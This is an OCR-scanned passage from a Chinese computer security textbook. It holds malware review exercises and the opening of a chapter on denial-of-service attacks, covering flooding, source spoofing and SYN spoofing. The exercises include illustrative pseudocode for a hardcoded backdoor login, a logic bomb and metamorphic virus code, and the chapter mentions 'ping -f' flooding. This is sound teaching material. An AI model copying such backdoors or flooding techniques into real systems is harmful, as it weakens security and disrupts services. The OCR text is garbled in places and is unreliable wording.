列举 三 种 恶意 软件 对 抗 机 制 部 署 的 位 置 。 

简要 描述 四 代 反 病毒 软件 。 


习题 


6.1 


6.2 


6.3 


6.4 


6.5 


计算 机 病毒 将 自己 的 副本 放置 到 其 他 程序 中 ， 并 安排 在 程序 执行 时 运行 代码 。“ 简 单 ” 方 法 只 是 在 
现 有 代码 之 后 追加 代码 ， 并 更 改 执行 代码 的 地 址 。 这 将 明显 增加 程序 的 大 小 ， 这 是 很 容易 被 观察 到 
的 。 请 对 此 进行 研究 ， 并 简要 列 出 一 些 不 改变 程序 大 小 的 方法 。 
有 这 样 一 个 问题 : 是 否 可 以 开发 一 个 程序 对 软件 进行 分 析 ， 以 此 来 判定 该 软件 是 否 是 病毒 程序 。 假 
设 我 们 有 一 个 程序 D 能 够 完成 这 样 的 工作 。 对 于 任意 程序 P， 当 我 们 运行 D(P) 时 ， 返 回 的 结果 是 
TRUE (P 是 病毒 ) 或 FALSE (P 不 是 病毒 )。 考 虑 如 下 的 程序 : 
Program CV := 

ls e 

main-program := 

{if D(CV) then goto next: 
else infect-executable; 


} 


next: 
} 


在 上 面 的 程序 中 ，infect-executable 是 这 样 一 个 模块 ， 它 扫描 内 存 中 的 可 执行 程序 ， 然 后 将 其 自身 复 
制 到 这 些 程序 中 。 如 果 D 能 够 正确 地 判断 的 话 ， 请 判定 CV 是 否 为 病毒 。 


下 面 是 一 段 病毒 指令 和 该 病毒 指令 变形 后 的 版 本 。 描 述 变形 代码 所 产生 的 效果 。 
原始 代码 变形 代码 
mov eax,5 mov eax,5 
add eax,ebx push ecx 
call [eax] pop ecx 


add eax,ebx 
Swap eax,ebx 
Swap ebx,eax 
call [eax] 
nop 


在 本 书 的 网 站 中 提供 了 Morris 蠕虫 所 用 到 的 口令 列表 。 

a. 很 多 人 都 认为 这 个 列表 列 出 了 人 们 一 般 用 作 口 令 的 所 有 单词 。 这 看 起 来 可 能 吗 ? 证 明 你 的 回答 。 
b. 如 果 这 个 列表 不 能 反映 出 经 常 使 用 的 所 有 口令 ， 那 么 提出 一 些 Moris 可 能 用 来 构建 这 个 列表 的 方法 。 
思考 如 下 程序 段 : 


legitimate code 

if data is Friday the 13th; 
crash computer (); 

legitimate code 
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6.6 


6.7 


6.8 


6.9 


这 属于 哪 类 恶意 软件 ? 
思考 下 面 的 认证 程序 片段 : 


username = read username (); 

password = read password (); 

if username is "133t h4ck0r" 
return ALLOW LOGIN; 

if username and password are valid 
return ALLOW LOGIN; 

else return DENY LOGIN 


这 属于 哪 类 恶意 软件 ? 

假如 你 在 单位 的 停车 场 捡 到 了 一 个 U 盘 。 如 果 你 将 此 U 盘 直 接连 接 至 你 的 工作 电脑 并 查看 其 中 的 
内 容 ， 这 一 做 法 可 能 会 带 来 什么 样 的 威胁 ? 特别 是 ， 思 考 是 不 是 我 们 所 讨论 过 的 每 种 恶意 软件 传播 
机 制 都 可 以 通过 这 样 一 个 存储 盘 进行 传播 ? 你 将 采用 哪些 步骤 以 降低 此 威胁 ， 并 安全 地 查看 存储 盘 
中 的 内 容 ? 

如 果 你 发 现 你 家 中 的 电脑 对 网 络 中 的 信息 请 求 响应 非常 慢 ， 并 且 在 进一步 检查 网 关 后 ， 你 发 现 即 
使 关闭 了 电子 邮件 客户 端 ， 浏 览 器 和 其 他 使 用 网 络 的 程序 ， 仍 能 发 现 有 大 量 的 网 络 活动 。 什 么 类 
型 的 恶意 软件 能 够 导致 此 类 情况 ? 讨论 此 恶意 软件 可 能 是 怎样 获得 对 你 的 系统 的 访问 的 ?你 能 够 
用 哪些 步骤 来 检测 是 否 存在 恶意 软件 ? 如 果 你 确实 在 电脑 中 发 现 恶意 软件 ， 如 何 将 其 恢复 为 安全 
的 系统 ? 

假如 当 你 要 从 一 些 网 站 上 收集 一 些 短视 频 时 ， 你 看 到 一 个 弹 窗 ， 告 诉 你 必须 要 安装 一 些 代 码 才 可 以 
观看 这 些 视频 。 如 果 你 允许 其 安装 ， 这 可 能 会 对 你 的 计算 机 系统 造成 什么 威胁 ? 


6.10 ”你 买 了 一 部 新 的 智能 手机 ， 对 可 以 使 用 大 量 的 App 感到 兴奋 。 你 了 解 到 一 款 好 玩 的 游戏 ， 然 后 在 


6.11 


6.12 


6.13 


6.14 


网 页 中 搜索 它 ， 在 一 个 免费 的 应 用 市 场 中 找到 了 一 个 可 用 的 版 本 。 当 你 准备 下 载 和 安装 App 时 ， 
你 被 要 求 赋予 其 一 定 的 权限 。 你 发 现 该 App 需要 “发 送 短信 ”和 “获取 你 的 地 址 簿 ”权限 。 你 会 
不 会 对 游戏 需要 这 类 权限 感到 惊讶 ? 这 个 App 可 能 会 对 你 的 手机 造成 什么 威胁 ， 你 是 否 会 同意 其 
要 求 的 权限 然后 安装 App ? 这 可 能 是 什么 类 型 的 恶意 软件 ? 

假如 你 接 到 了 一 封 电子 邮件 ， 看 上 去 像 是 你 的 上 司 发 来 的 ， 主 题 是 过 问 你 最 近 正 在 做 的 项 目 。 当 
你 查看 电子 邮件 时 ， 邮 件 要 求 你 浏览 附件 ， 附 件 是 一 个 压缩 包 ， 里面 有 一 个 PDF 文档 ， 你 在 解压 
前 检查 一 切 细节 无 误 。 当 你 试图 打开 PDF 时 ,阅读 右 弹 出 了 一 个 题 为 “ 载 入 文件 ”的 对 话 框 ， 表 
明 “ 设 置 文件 和 阅读 器 应 用 程序 来 加 载 PDF 文档 。 对 话 框 中 有 名 为 “文件 ”的 选项 ， 中 间 有 许 
多 空 行 ， 最 后 有 名 为 “打开 ”和 “关闭 ”两 个 按钮 ， 用 来 查看 这 个 文档 。 你 也 注意 到 有 一 个 垂直 
的 拖 动 条 。 如 果 你 点 击 这 个 “打开 ”按钮 ， 你 的 计算 机 系统 可 能 会 受到 什么 样 的 威胁 ? 在 查看 可 
疑 内 容 时 ， 怎 么 样 才能 不 对 你 的 系统 产生 威胁 ? 这 种 类 型 的 信息 会 让 你 联想 到 什么 类 型 的 攻击 ? 
有 多 少 人 可 能 接 到 过 类 似 的 电子 邮件 ? 

假设 你 接 到 了 一 封 电 子 邮 件 ， 看 上 去 像 来 自 你 光顾 过 的 银行 ， 里 面 有 银行 的 Logo， 内 容 如 下 : 
“亲爱 的 顾客 ， 我 们 的 记录 显示 你 的 网 银 由 于 多 次 试图 利用 错误 的 账号 、 口 令 和 安全 验证 码 进行 登 
K, 已 被 冻结 。 我 们 极力 建议 你 立刻 恢复 账户 权限 ， 避 人 免 被 永久 冻结 ， 请 点 此 链接 恢复 你 的 账户 ， 
感谢 你 。 

这 封 电子 邮件 试图 进行 何 种 攻击 ”用 来 分 发 此 类 邮件 最 可 能 的 机 制 是 什么 ”如 何 应 对 此 类 邮件 ? 
假设 你 从 一 个 金融 公司 收 到 一 封 信 ， 信 中 说 你 拖欠 贷款 ， 要 求 及 时 偿还 。 但 是 ， 你 知道 你 从 来 没 
申请 过 或 收 到 过 该 公司 的 贷款 ! 究竟 发 生 了 什么 才 让 这 样 一 笔 贷 款 “ 冒 了 出 来 ”? 是 什么 样 的 恶 
意 软 件 ， 通 过 哪些 计算 机 系统 ， 给 予 了 攻击 者 足够 的 信息 来 成 功 申 请 这 笔 贷 款 ? 

列 出 个 人 电脑 会 遭受 的 攻击 类 型 ， 和 个 人 【基于 主机 ) 防火 墙 和 反 病 毒 软件 应 帮 你 对 抗 哪些 类 型 的 
攻击 。 何 种 措施 可 以 帮助 阻止 宏 病 毒 通过 电子 邮件 附件 传播 ? 如 何 防 止 系统 中 的 后 门 被 利用 ? 
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拒绝 服务 攻击 





学 习 目 标 

pig ett 你 应 该 能 够 : 
o 解释 拒绝 服务 攻击 的 基本 概念 ; 
理解 洪 泛 攻击 的 本 质 ; 
描述 分 布 式 拒 绝 服务 攻击 ; 


解释 基于 应 用 程序 的 带宽 攻击 的 概念 ， 并 举 出 一 些 实例 ; 
概述 反射 攻击 和 放大 攻击 ; 
总 结 一 些 常用 的 拒绝 服务 攻击 对 抗 方法 ; 

第 用 的 对 拒绝 服务 攻击 的 应 对 方法 。 


在 第 1 章 中 ， 我 们 列 出 了 一 些 基 本 的 安全 服务 ， 其 中 之 一 就 是 可 用 性 安全 服务 。 可 用 性 安 
全 服务 关系 到 授权 用 户 在 有 服务 请 求 时 是 否 可 以 访问 或 者 使 用 一 个 系统 。 拒 绝 服务 攻击 (DoS 
攻击 ) 试图 通过 完全 地 阻碍 或 阻塞 服务 器 所 提供 的 一 些 正常 服务 来 破坏 服务 的 可 用 性 。 攻 击 学 
斌 耗 尽 一 些 与 服务 相关 的 重要 系统 资源 。 例 如 ， 一 个 对 Web 服务 器 发 起 的 洪 泛 攻击 ， 攻 击 者 
发 起 相当 多 的 虚假 请 求 ， 使 得 服务 右 几 乎 不 可 能 及 时 地 响应 来 自用 户 的 正常 请 求 。 在 本 章 中 ， 
我 们 将 探讨 拒绝 服务 攻击 ， 包 括 它 的 定义 、 攻 击 所 采取 的 形式 和 相关 的 防范 措施 。 


7.1 拒绝 服务 攻击 


2010 年 12 月 ， 一 些 网 站 与 具有 争议 的 WikiLeaks 网 站 切断 连接 而 导致 这 些 网 站 临时 关 
闭 ， 其 中 包括 Visa 和 MasterCard， 该 事件 成 了 全 球 性 的 新 闻 。 出 于 各 式 各 样 的 原因 ， 类 似 的 
攻击 每 天 都 会 发 生成 百 上 千 次 。 如 此 频繁 的 攻击 的 发 生 ， 某 种 程度 上 归 因 于 中 断 Web 站 点 的 
服务 非常 轻易 。 

黑客 开展 分 布 式 拒绝 服务 攻击 (Distributed Denial-of-Service, DDoS) 已 经 十 余年 ， 随 着 时 
加 的 推移 ， 其 攻击 能 力也 在 不 断 提 高 。 由 于 Internet 带宽 的 增长 ， 分 布 式 拒绝 服务 攻击 的 最 大 
规模 从 2002 年 的 400Mbps 增长 到 2010 年 的 100Gbps[ARBO10]， 并 且 在 2013 年 的 Spamhaus 
攻击 中 达到 了 300Gbps， 在 2015 年 的 BBC 攻击 中 甚至 达到 了 600Gbps， 大 部 分 在 50Gbps 范 
围 内 的 洪 泛 攻 击 已 经 几乎 能 够 超过 任意 预期 目标 的 带宽 容量 了 ， 包 括 Internet 核心 交换 节点 和 
E DNS 域名 服务 硕 在 内 。 即 使 是 稍 小 规模 的 攻击 也 可 能 产生 惊人 的 效果 。[SYMA16] 指出 ， 
DDoS 攻击 在 数量 和 强度 上 都 在 不 断 增 加 ， 但 是 因 其 由 雇佣 僵尸 网 络 驱动 ， 故 而 最 多 仅 可 持续 
30 分 钟 或 更 短 。 分 布 式 拒绝 服务 攻击 的 原因 包括 金融 勒索 ， 黑 客 主义 ， 以 及 国家 支持 的 对 反 
对 者 的 攻击 。 曾 有 媒体 报道 过 这 样 一 则 新 闻 : 某 犯 罪 组 织 利 用 DDoS 攻击 银行 系统 ， 以 掩盖 其 
攻击 银行 支付 设备 和 ATM 网 络 的 企图 。 这 些 攻击 由 于 其 设置 简单 、 难 以 停止 、 十 分 有 效 等 特 
点 而 很 受 欢迎 [SYMA16]。 

2016 年 10 月 的 DDoS 攻击 代表 着 这 一 威胁 中 不 祥 的 新 趋势 。 该 攻击 针对 主要 域名 系统 
(DNS) 服务 提供 商 Dyn， 并 且 持 续 了 数 小 时 之 入， 涉及 来 自 超过 10 万 次 恶意 攻击 端点 的 多 波 
攻击 。 这 一 攻击 的 显著 特点 是 攻击 源 招募 了 物 联网 (oT) 设备 ,例如 网 络 摄 像 头 和 婴儿 监视 
佑 。 据 估计 攻击 流量 的 峰值 甚至 高 达 1.2 Tbps[LOSH16]。 
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7.1.1 拒绝 服务 攻击 的 本 质 


拒绝 服务 ( Denial-of-Service, DoS) 攻击 是 一 种 针对 某 些 服务 可 用 性 的 攻击 。 在 计算 机 和 
通信 安全 的 背景 下 ，DoS 攻击 一 般 攻 击 目标 系统 的 网 络 服务 ， 通 过 攻击 其 网 络 连接 来 实现 。 这 
种 针对 服务 可 用 性 的 攻击 不 同 于 其 他 传统 意义 上 的 不 可 抗力 产生 的 攻击 ， 它 是 通过 造成 IT 基 
础 设施 的 损害 或 毁坏 而 导致 服务 能 力 的 丧失 。 

NIST SP 800-61 (计算 机 安全 事件 处 理 指 南 , 2012 年 8 月 ) 中 对 DoS 攻击 给 出 的 定义 如 下 : 





由 上 述 定 义 可 知 ， 可 作为 DoS 攻击 对 象 的 资源 有 下 面 几 类 : 

e iK T 

e 系统 资源 

e 应 用 资源 

网 络 市 宽 与 连接 服务 器 和 Internet 的 网 络 链 路 的 容量 相关 。 对 于 大 部 分 组 织 来 说 ， 网 络 市 
宽 指 的 是 连接 到 其 网 络 服务 提供 商 (Internet Service Provider, ISP) 的 链 路 容量 ， 如 图 7-1 
给 出 的 网 络 实例 所 示 。 通 党 这 个 连接 的 容量 低 于 ISP 路 由 器 内 部 以 及 ISP 路 由 需 之 间 的 链 路 容 
量 。 这 就 意味 者 可 能 会 发 生 这 样 的 情况 : 经 过 具有 更 高 容量 的 链 路 的 到 达 ISP 路 由 器 的 通信 量 
要 高 于 到 组 织 的 链 路 的 通信 量 。 在 这 种 情况 下 ，ISP 路 由 需 只 能 发 送 链 路 所 能 承载 的 最 大 流量 ， 
对 于 超出 的 流量 必须 丢弃 。 在 正常 网 络 运 行 环境 下 ， 由 于 正常 用 户 的 超 负 蓓 访问 ， 同 样 会 使 得 
服务 融 网 络 繁 忙 。 那 么 这 些 正常 用 户 当 中 就 会 随机 地 有 一 部 分 不 能 够 得 到 服务 硕 的 啊 应 。 对 于 
MEAE] TCP/IP 网 络 连接 来 说 ， 服 务 需 不 可 用 也 是 在 预料 之 中 的 。 但 在 DoS 攻击 的 情 
况 下 ， 攻 击 者 直接 或 间接 地 制造 出 大 量 的 恶意 流量 发 往 目 标 服务 器 。 这 种 攻击 流量 相 比 任何 的 
合法 流量 来 说 是 压倒 性 的 ， 其 有 效 地 拒绝 了 合法 用 户 对 服务 需 的 访问 。 最 近 某 些 大 强度 的 攻击 
直接 针对 为 目标 组 织 提供 支持 的 ISP 网 络 ， 目 的 在 于 破坏 其 与 其 他 网 络 的 连接 。 文 献 [ AROR11] 
中 列 出 了 很 多 最 近 出 现 的 DDoS 攻击 ， 其 中 还 包括 有 关 这 些 攻击 的 强度 和 危害 性 的 相关 评论 。 





PN o à an 大 型 企业 LAN P 
| 中 型 企业 LAN 7 ? wr 
Web 服 务 器 W PSF LAN PC 
Web 服 务 器 和 工作 站 


图 7-1 说 明 DoS 攻击 的 网 络 实例 
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针对 系统 资源 的 DoS Wed, —Ae ee eh eh Ea He FA Be 2 Ah BE A Pt HE SD 
击 。 相 比 于 通过 消耗 网 络 带宽 的 DoS 攻击 来 说 ， 这 种 攻击 更 胜 一 筹 ， 其 利用 特殊 类 型 的 数据 
包 耗 尽 服 务 硕 上 有 限 的 可 用 系统 资源 ， 从 而 达到 攻击 目的 。 这 些 系统 资源 包括 接收 数据 包 的 临 
时 缓冲 区 、 打 开 连 接 表 和 类 似 的 内 存 数 据 结构 。 接 下 来 我 们 要 讲 到 的 SYN 欺骗 攻击 ， 就 是 这 
种 类 型 的 攻击 ， 其 攻击 目标 是 服务 器 上 的 TCP 连接 表 。 

为 一 种 形式 的 针对 系统 资源 的 DoS 攻击 ， 通 过 使 用 某 些 特殊 数据 包 来 触发 系统 的 网 络 处 
理 软 件 的 缺陷 ， 导 致 系统 崩溃 。 如 果 受 到 这 种 Dos 攻击 ， 除 非 管理 员 重 新 启动 网 络 处 理 程序 
(这 一 般 通 过 重新 局 动 目标 系统 实现 )， 和 否则 服务 噩 将 无 法 再 通过 网 络 处 理 程序 来 提供 网 络 服务 。 
例如 ， 有 毒 数据 包 (poison packet) 就 是 这 种 可 以 使 得 网 络 处 理 软件 出 错 的 特殊 数据 包 。 经 典 
的 死亡 之 ping (ping of death) 和 泪 滴 攻击 (teardrop) 也 是 这 种 类 型 的 攻击 ， 它 们 主要 是 针对 
早期 的 Windows 9x 操作 系统 。 这 两 种 攻击 分 别针 对 Windows 网 络 代 码 中 处 理 ICMP 回 送 请 求 
数据 包 和 数据 包 分 片 的 程序 中 存在 的 缺陷 。 

针对 特定 应 用 服务 程序 如 Web 服务 器 的 攻击 一 般 使 用 一 定数 量 的 合法 请 求 ， 而 每 个 合 
法 请 求 都 会 明显 地 消耗 掉 服 务 器 上 的 系统 资源 ， 那 么 就 可 以 达到 限制 服务 器 响应 其 他 合法 用 
户 请 求 的 目的 。 例 如 ， 某 Web 服务 器 可 能 会 提供 数据 库 查 询 服 务 。 如 果 能 够 构造 出 一 个 巨 
大 的 、 高 代价 的 查询 请 求 ， 攻 击 者 就 能 够 向 服务 絮 提 出 大 量 的 这 类 查询 请 求 。 这 样 就 会 限制 
Web 服务 硕 啊 应 其 他 合法 用 户 的 查询 请 求 。 所 谓 的 cyberslam 攻击 就 是 这 种 类 型 的 DoS 攻击 。 
[KAND05] 中 讨论 了 这 种 攻击 并 给 出 了 一 些 可 行 的 应 对 策略 。 另 一 种 攻击 方法 是 通过 构造 出 一 
个 能 触发 服务 右 程 序 出 错 的 查询 请 求 ， 最 终 导致 服务 器 程序 骨 演 。 这 就 是 说 ， 除 非 重 新 启动 ， 
否则 服务 硕 将 不 再 能 够 啊 应 用 户 的 请 求 。 

DoS 攻击 同样 可 以 按照 攻击 主机 ( 即 产生 流向 目标 系统 的 流量 的 主机 ) 的 数量 来 区 分 。 最 
初 ， 攻 击 者 仅 控 制 使 用 一 台 或 少数 几 台 源 系统 。 任 何 攻击 ， 都 要 针对 服务 器 的 网 络 处 理 代码 或 
某 个 应 用 的 缺陷 回 服务 器 发 送 数据 包 。 通 常 ， 需 要 采用 分 布 式 或 者 放大 的 DoS 攻击 使 多 个 系 
统 同时 产生 很 高 的 通信 流量 。 稍 后 我 们 会 讨论 这 些 攻击 。 


7.1.2 经 典 的 拒绝 服务 攻击 


对 于 一 个 组 织 ， 最 简单 经 典 的 DoS 攻击 就 是 洪 泛 攻击 (fooding attack)。 潜 泛 攻 击 的 目标 
就 是 占据 所 有 到 目标 组 织 的 网 络 连接 的 容量 。 如 果 攻 击 者 能 够 访问 具有 大 容量 网 络 连接 的 系 
统 ， 那 么 这 个 系统 可 能 会 产生 比 目 标 连接 容量 大 得 多 的 通信 流量 。 在 图 7-1 所 示 的 网 络 中 ， 攻 
击 者 可 以 利用 大 型 公司 的 Web 服务 器 来 攻击 那些 有 较 小 容量 网 络 连接 的 中 型 公司 的 Web 服务 
aro DOTA AT VA fal th AKA ping 9 数据 包 给 目标 公司 的 Web 服务 器 ， 这 些 流量 可 以 被 它 
们 之 间 的 路 径 上 的 高 容量 链 路 所 处 理 ， 直 到 到 达 Internet 云图 中 的 最 终 路 由 器 。 在 这 里 ， 一 些 
数据 包 被 丢弃 ， 剩 余 的 数据 包 将 会 消耗 掉 到 中 型 公司 的 链 路 的 大 部 分 容量 。 这 导致 该 链 路 出 现 
拥塞 ， 致 使 其 他 有 效 流 量 基 本 上 被 丢弃 。 

在 经 典 的 ping 洪 泛 攻击 中 ，ICMP 回 送 请 求 数据 包 的 源 地 址 使 用 的 是 攻击 者 的 真实 IP 
地 址 ， 攻 击 的 源 很 容易 被 识别 。 那 么 从 攻击 者 的 角度 看 就 会 存在 两 个 问题 : 第 一 ， 由 于 攻击 
源 很 容易 被 清楚 地 识别 ， 那 么 被 发 现 和 受到 法 律 追 究 的 可 能 性 大 大 增加 。 第 二 ， 目 标 系 统 会 
尽 可 能 地 响应 请 求 。 每 当 服务 器 接收 到 一 个 ICMP 回 送 请 求 数据 包 ， 就 会 发 送 一 个 ICMP 回 
送 啊 应 数据 包 给 攻击 者 ， 这 会 将 攻击 反射 给 攻击 源 。 尽 管 攻击 者 拥有 较 高 的 网 络 带 宽 而 不 

O “ping” 命 令 是 一 个 常用 的 网 络 诊断 程序 ， 用 于 测试 到 特定 主机 的 连接 情况 。 该 命令 向 目标 主机 发 送 TCP/IP 


ICMP 回 送 请 求 数据 包 并 测量 回 送 响应 数据 包 返回 的 时 间 。 通 常 这 些 包 以 一 个 可 控 的 速率 发 送 ， 然 而 ， 洪 泛 
选项 指定 这 些 包 的 发 送 应 该 尽 可 能 地 快 ， 这 通常 用 命令 “ping -f” 设 定 。 
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至 于 被 这 些 返 送 回来 的 ICMP 回 送 啊 应 数据 包 “ 反 ping 死 "， 但 其 网 络 性 能 也 会 被 显著 地 影 
啊 ， 并 且 加 大 了 被 发 现 并 采取 应 对 措施 的 可 能 。 出 于 这 些 原因 ， 攻 击 者 一 般 者 会 隐藏 其 真实 
的 身份 。 这 意味 着 任何 一 个 攻击 数据 包 都 将 使 用 一 个 不 存在 的 或 者 虚假 地 址 作为 数据 包 的 源 
地 址 。 


7.1.3 源 地 址 欺骗 


在 很 多 类 型 的 DoS 攻击 中 ， 所 使 用 数据 包 的 一 个 共同 特征 是 采用 伪造 的 源 地 址 ， 也 就 是 
所 谓 的 源 地 址 欺骗 (source address spoofing)。 只 要 拥有 访问 某 计算 机 系统 上 网 络 处 理 程序 的 
充分 权限 ， 攻 击 者 就 能 够 很 容易 地 制造 出 具有 伪造 源 地 址 的 数据 包 (实际 上 ， 其 他 属性 正常 ) 。 
这 往往 是 通过 许多 操作 系统 上 的 原始 套 接 字 接口 (raw socket interface) 来 实现 的 。 操 作 系 统 设 
计 者 是 为 了 进行 某 些 自 定义 的 网 络 测试 或 网 络 协议 的 研究 而 引入 原始 套 接 字 接 口 的 ， 并 不 是 用 
于 正常 的 网 络 操作 。 然 而 ， 由 于 历史 兼容 性 和 继承 性 ， 在 当今 一 些 操作 系统 当中 仍然 保留 着 原 
始 套 接 字 接 口 。 攻 击 者 利用 这 些 可 用 的 标准 接口 就 可 以 相当 轻松 地 制造 出 具有 伪造 属性 的 数据 
包 。 如 果 没 有 这 些 接口 ， 攻 击 者 要 想 制 造 出 具有 伪造 源 地 址 的 数据 包 ， 就 不 得 不 安装 一 些 自 定 
义 的 设备 驱动 程序 来 获得 硬件 级 的 设备 访问 权限 。 这 将 给 攻击 者 造成 很 大 的 麻烦 ， 并且 还 依赖 
于 攻击 者 所 使 用 的 操作 系统 的 版 本 。 

由 于 拥有 了 对 网 络 接口 的 硬件 级 访问 权限 ， 攻 击 者 可 以 制造 出 大 量 的 目的 地 址 指向 目标 
系统 的 数据 包 ， 但 这 些 数据 包 的 源 地 址 是 随机 选择 的 ， 通 常 各 不 相同 。 拿 上 一 节 我 们 所 讲 到 
的 ping 洪 泛 攻击 来 举例 ， 自 定义 的 ICMP 回 送 请 求 数据 包 从 源 系统 经 由 同一 路 径 发 向 目标 系 
统 ， 同 样 的 拥塞 将 发 生 在 连接 到 最 终 的 低 容 量 链 路 的 路 由 器 上 。 然 而 ， 作 为 这 些 数据 包 到 达 
目标 系统 的 响应 的 ICMP 回 送 响应 数据 包 将 不 能 再 反 送 给 源 系 统 ， 而 是 散发 到 Internet 上 各 种 
伪造 的 源 地 址 。 其 中 一 些 地 址 可 能 对 应 于 真实 系统 。 因 为 这 些 系 统 并 不 期 望 收 到 响应 数据 包 ， 
所 以 它们 可 能 会 以 差错 报告 数据 包 响 应 。 这 只 能 是 增 大 目标 系统 的 网 络 负 荷 。 还 有 一 些 地 址 
未 被 使 用 或 不 可 到 达 。 对 于 这 些 ICMP 回 送 啊 应 数据 包 ， 可 能 会 返回 ICMP. 目的 不 可 达 数 据 
包 ， 或 者 将 数据 包 人 简单 抛弃 8。 任 何 返 送 回来 的 数据 包 只 会 加 大 目标 系统 的 网 络 拥塞 。 

使 用 带 有 伪造 源 地 址 的 数据 包 也 会 使 得 发 现 攻击 者 很 困难 。 攻 击 数据 包 看 上 去 是 由 分 散 
在 Internet 上 的 主机 产生 的 ， 因 而 简单 地 分 析 数 据 包 的 头 部 属性 是 不 足以 检测 出 攻击 者 的 。 然 
而 在 数据 包 从 攻击 源 到 目标 系统 之 间 的 路 由 器 上 ， 我 们 必须 识别 出 这 些 异 常数 据 包 。 这 就 需要 
管理 这 些 路 由 器 的 网 络 工 程 师 们 之 间 相 互 合作 ， 这 相 比 于 简单 地 读 取 数据 包 的 源 地 址 要 复杂 得 
多 。 检 测 异 常数 据 包 不 是 接收 者 单方 面 的 工作 ， 而 是 需要 整个 网 络 的 网 络 工程 师 来 协作 检测 经 
过 他 们 所 管理 路 由 上 需 的 流量 信息 。 这 是 一 个 既 耗 时 又 耗 力 的 人 工 工作 。 

为 什么 Internet 中 人 允许 如 此 容易 地 伪造 源 地 址 是 值得 我 们 深思 的 。 追 溯 到 TCP/IP 发 展 的 
早期 ， 网 络 之 间 的 通信 都 是 在 可 信任 的 、 相 互 合 作 的 网 络 之 间 进 行 的 ， 因 而 TCP/IP 根本 就 没 
有 必要 验证 数据 包 的 源 地 址 是 否 与 数据 包 生 成 者 相 一 致 ， 这 种 一 致 性 设 为 默认 的 。 其 实 我 们 可 
以 在 路 由 器 上 安装 过 滤器 来 确认 数据 包 源 地 址 的 真实 性 (至少 确认 该 源 地 址 是 合法 的 )。 然 而 ， 
过 滤 9 应 该 尽 可 能 地 在 接近 源 系统 的 路 由 器 上 进行 ， 因 为 越 接 近 源 系统 的 路 由 器 ， 它 上 面 的 关 
于 合法 源 地 址 的 信息 就 越 准 确 。 大 体 上 ， 过 滤 需 应 该 安装 在 组 织 连 接 到 Internet 的 路 由 器 上 ， 即 
ISP 提供 该 连接 的 边界 上 。 对 于 DoS 类 的 攻击 ， 尽 管 这 是 长 期 以 来 推荐 的 安全 建议 ， 例 如 (RFC 
2827 )， 但 一 直 未 被 ISP 采纳 ， 因 此 使 得 利用 具有 伪造 源 地 址 的 数据 包 的 DoS 攻击 常常 发 生 。 


日 “为 响应 其 他 ICMP 包 而 产生 的 ICMP 包 通 常 首先 被 丢弃 。 


O 这 就 是 通常 所 说 的 “出 口 过 滤 ”。 
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这 种 为 了 响应 具有 伪造 源 地 址 的 数据 包 而 产生 的 呈 发 散 状 发 送 到 网 络 上 的 啊 应 数据 包 有 
一 个 有 用 的 “副作用 ”。 安 全 研究 人 员 ， 如 从 事 Honeynet 项 目的 研究 人 员 ， 会 屏蔽 掉 未 被 使 用 
的 IP 地 址 ， 提 供 建 议 路 由 ， 然 后 收集 发 送 到 这 些 地 址 的 数据 包 。 由 于 并 没有 真实 的 主机 使 用 
这 些 地 址 ， 那 么 发 送 到 这 个 地 址 的 数据 包 一 定 是 异常 的 数据 包 。 任 何 一 个 接收 的 数据 包 都 可 能 
是 恶意 的 ， 因 为 它 很 可 能 是 来 自 直 接 或 间接 的 网 络 攻 击 。 举 个 例子 来 说 ， 在 ping 洪 泛 攻击 中 ， 
目标 系统 为 了 响应 ICMP 回 送 请 求 数 据 包 所 产生 的 ICMP 回 送 啊 应 数据 包 就 属于 这 种 数据 包 。 
这 也 就 是 所 谓 的 发 散 反馈 流量 (backscatter traffic)。 例 如 ， 正 如 在 [MOOR06] 中 所 描述 的 ， 监 
视 数 据 包 类 型 可 以 为 我 们 在 判定 攻击 类 型 和 攻击 规模 时 提供 有 用 信息 。 这 些 信 息 正 在 用 于 开发 
对 已 有 攻击 的 应 对 策略 。 


7.1.4 SYN 欺骗 


除了 基本 的 洪 泛 攻击 ， 另 一 种 常见 的 经 典 DoS 攻击 是 SYN KAk, SYN 欺骗 攻击 通过 
造成 服务 器 上 用 于 管理 TCP 连接 的 连接 表 滋 d 服务 器 
出 ， 从 而 攻击 网 络 服务 器 响应 TCP 连接 请 求 s 
的 能 力 。 这 意味 着 以 后 的 合法 用 户 的 TCP 连 
接 请 求 将 得 不 到 服务 器 响应 ， 拒 绝 其 访问 服务 


fit. SYN 欺骗 攻击 是 针对 系统 资源 的 DoS 攻 SF 
击 ， 具体 地 说 就 是 针对 操作 系统 上 网 络 处 理 程 (seq=x) 一 
序 的 攻击 。 
为 了 便于 理解 这 种 攻击 的 原理 ， 我 们 SYN-ACK 
先 回顾 一 下 TCP 用 来 建立 连接 的 三 次 握手 。 (seq=y, ack=x+1) 
) 





如 图 7-2 所 示 ， 客 户 端 初 始 化 一 个 带 有 SYN BRESYNCACK 
标志 的 数据 包 并 发 送 给 服务 絮 ， 以 发 起 TCP 
连接 请 求 。 这 个 SYN 数据 包 中 包括 了 客户 端 。 发 和 AcCK 


(ack=y+1) 接收 ACK 


(ack=y+1) 


的 地 址 、 端 口 和 初始 序号 ， 当 然 也 可 以 包含 对 
其 他 TCP HEIR AV TR. ARB ARTE TCP 连接 表 
中 记录 下 这 个 连接 请 求 的 详细 信息 ， 接 着 用 
SYN-ACK 数据 包 来 响应 客户 端的 请 求 。SYN- 图 7-2 TCP 三 次 连接 握手 
ACK 数据 包 中 包括 服务 器 的 序号 ， 并 将 客户 端的 序号 加 1， 以 确认 SYN 数据 包 已 经 收 到 。 一 
旦 客户 端 接收 到 服务 需 的 SYN-ACK 数据 包 ， 客 户 端 就 会 发 送 一 个 ACK 数据 包 给 服务 器 ， 其 
中 的 服务 器 序号 加 1， 并 将 TCP 连接 标记 为 已 连接 。 同 样 地 ， 当 服务 器 接收 到 这 个 来 自 客户 端 
的 ACK 数据 包 时 ， 也 会 将 TCP 连接 标记 为 已 连接 。 此 后 ， 双 方 就 可 以 利用 这 个 TCP 连接 来 
传输 数据 了 。 然 而 在 现实 情况 下 ， 这 种 理想 的 交互 操作 常常 会 失败 。TCP 三 次 握手 中 所 使 用 的 
数据 包 都 是 通过 IP 协议 传输 的 ， 而 IP 协议 是 一 种 不 可 靠 的 、 尽 力 而 为 ( best-effort) 的 网 络 协 
议 。 在 此 协议 中 ,任何 数 据 包 在 传输 过 程 中 都 有 可 能 丢失 ， 如 由 于 网 络 拥塞 而 丢失 。 因 此 ,无 
论 客户 端 还 是 服务 器 都 需要 跟踪 其 发 送 的 数据 包 。 如 果 在 规定 的 时 间 内 没有 得 到 啊 应 ， 就 需要 
